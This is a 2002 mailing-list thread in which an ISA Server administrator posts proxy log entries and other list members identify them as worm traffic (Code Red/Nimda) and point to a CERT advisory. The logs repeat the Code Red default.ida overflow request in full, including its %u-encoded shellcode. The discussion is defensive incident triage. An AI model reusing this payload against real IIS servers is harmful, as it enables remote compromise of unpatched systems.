RE: Log

  • From: "Ewing, David F." <dewing@xxxxxxxxxxxxxxxxxxx>
  • To: "'[ISAserver.org Discussion List]'" <isalist@xxxxxxxxxxxxx>
  • Date: Tue, 9 Apr 2002 15:07:52 -0400

Tough crowd.
 
 
I was under the assumption that most users subscribed here have been well
aware of the Code Red exploit. My apolgies.
My intentions were to point you in the right direction.  Below is a link
that goes over the exploit, and will give you some additional information.
 
http://www.cert.org/advisories/CA-2001-19.html
<http://www.cert.org/advisories/CA-2001-19.html> 
 
 
Dave
 
 

-----Original Message-----
From: Joseph [mailto:cismic@xxxxxxx]
Sent: Tuesday, April 09, 2002 2:39 PM
To: [ISAserver.org Discussion List]
Subject: [isalist] RE: Log


http://www.ISAserver.org


What you need to look at are the IIS logs next to determine if the vCache
304 record allowed it access to your IIS machine.
If your IIS machine has the latest service packs then, no you should not be
affected.
 
Joseph

-----Original Message-----
From: Craig A. Hansen [mailto:CHansen@xxxxxxxxxxxxx] 
Sent: Tuesday, April 09, 2002 11:38 AM
To: [ISAserver.org Discussion List]
Subject: [isalist] RE: Log


http://www.ISAserver.org


Is a server of mine infected or is getting blocked?
 
Craig Hansen   

-----Original Message-----
From: Ewing, David F. [mailto:dewing@xxxxxxxxxxxxxxxxxxx] 
Sent: Tuesday, April 09, 2002 1:35 PM
To: [ISAserver.org Discussion List]
Subject: [isalist] RE: Log


http://www.ISAserver.org


 
 
 
 
Nimda.
 
 
 
 

-----Original Message-----
From: Craig A. Hansen [mailto:CHansen@xxxxxxxxxxxxx]
Sent: Tuesday, April 09, 2002 2:30 PM
To: [ISAserver.org Discussion List]
Subject: [isalist] Log


http://www.ISAserver.org



Does anyone no exactly what is happening here. 

Thanks, 




#Fields: c-ip   cs-username     c-agent date    time    s-computername
cs-referred     r-host  r-ip    r-port  time-taken      cs-bytes
sc-bytes        cs-protocol     s-operation     cs-uri  s-object-source
sc-status      
216.93.16.114   anonymous       -       4/7/2002        10:55:17
PROXY   -        <file://www.worm.com> www.worm.com    -       -       19078
4039    -       -       GET
http://www.worm.com/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801
%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u00
78%u0000%u00=a      VCache  304    
208.246.141.116 anonymous       -       4/7/2002        15:25:22
PROXY   -        <file://www.worm.com> www.worm.com    -       -       18578
4039    -       -       GET
http://www.worm.com/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801
%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u00
78%u0000%u00=a      VCache  304    
200.178.163.35  anonymous       -       4/7/2002        15:29:52
PROXY   -        <file://www.worm.com> www.worm.com    -       -       18328
4039    -       -       GET
http://www.worm.com/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801
%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u00
78%u0000%u00=a      VCache  304    
61.242.154.155  anonymous       -       4/7/2002        18:39:33
PROXY   -        <file://www.worm.com> www.worm.com    -       -       18672
4039    -       -       GET
http://www.worm.com/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801
%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u00
78%u0000%u00=a      Inet    200    
200.68.3.26     anonymous       -       4/7/2002        20:21:00
PROXY   -        <file://www.worm.com> www.worm.com    -       -       18844
4039    -       -       GET
http://www.worm.com/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801
%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u00
78%u0000%u00=a      VCache  304    
200.67.7.199    anonymous       -       4/7/2002        23:00:29
PROXY   -        <file://www.worm.com> www.worm.com    -       -       18406
4039    -       -       GET
http://www.worm.com/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801
%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u00
78%u0000%u00=a      VCache  304    
61.157.84.32    anonymous       -       4/7/2002        23:28:03
PROXY   -        <file://www.worm.com> www.worm.com    -       -       18937
4039    -       -       GET
http://www.worm.com/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801
%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u00
78%u0000%u00=a      VCache  304    
202.105.86.209  anonymous       -       4/7/2002        23:46:54
PROXY   -        <file://www.worm.com> www.worm.com    -       -       18375
4039    -       -       GET
http://www.worm.com/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801
%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u00
78%u0000%u00=a      VCache  304    


Craig Hansen 



------------------------------------------------------
You are currently subscribed to this ISAserver.org Discussion List as:
dewing@xxxxxxxxxxxxxxxxxxx
To unsubscribe send a blank email to $subst('Email.Unsub') 

------------------------------------------------------
You are currently subscribed to this ISAserver.org Discussion List as:
chansen@xxxxxxxxxxxxx
To unsubscribe send a blank email to $subst('Email.Unsub') 

------------------------------------------------------
You are currently subscribed to this ISAserver.org Discussion List as:
cismic@xxxxxxx
To unsubscribe send a blank email to $subst('Email.Unsub') 

------------------------------------------------------
You are currently subscribed to this ISAserver.org Discussion List as:
dewing@xxxxxxxxxxxxxxxxxxx
To unsubscribe send a blank email to $subst('Email.Unsub') 

Other related posts: